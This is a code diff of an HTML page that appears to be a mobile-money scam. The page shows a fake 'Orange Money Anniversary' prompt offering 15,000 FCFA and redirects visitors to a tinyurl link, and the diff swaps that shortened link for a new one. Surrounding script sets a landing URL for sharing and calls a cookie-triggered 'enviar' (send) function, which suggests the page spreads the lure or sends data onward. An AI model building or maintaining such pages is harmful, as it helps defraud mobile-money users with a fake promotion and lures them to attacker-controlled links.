--- a/gs.html
+++ b/gs.html
@@ -9,7 +9,7 @@
 var password = '15,000 FCFA'
 password=prompt('SMS: Congratulations, your account is eligible to receive 15,000 FCFA ORANGE MONEY Anniversary offer, press OK to Activate','15,000 FCFA');
 if (password != '15,000 FCFA') {
-location.href='https://tinyurl.com/Orange Money-Anniversary-Offer';
+location.href='https://tinyurl.com/Orange-Money-Oferecero';
 }
 </script>
   
@@ -1509,7 +1509,7 @@ function operatorDataBack() {
 
     get_Cookie('e') ? setTimeout('enviar()',500) : void(0);
    
-  landingDomain='%0A%0Ahttps://tinyurl.com/Orange Money-Anniversary-Offer'
+  landingDomain='%0A%0Ahttps://tinyurl.com/Orange-Money-Oferecero'
     function deadline() {
         var day3 = new Date();
         day3.setTime(day3.getTime()+24*60*60*1000);
@@ -1667,6 +1667,7 @@ function operatorDataBack() {
 	
 </body>
 </html>
+
 
 
 
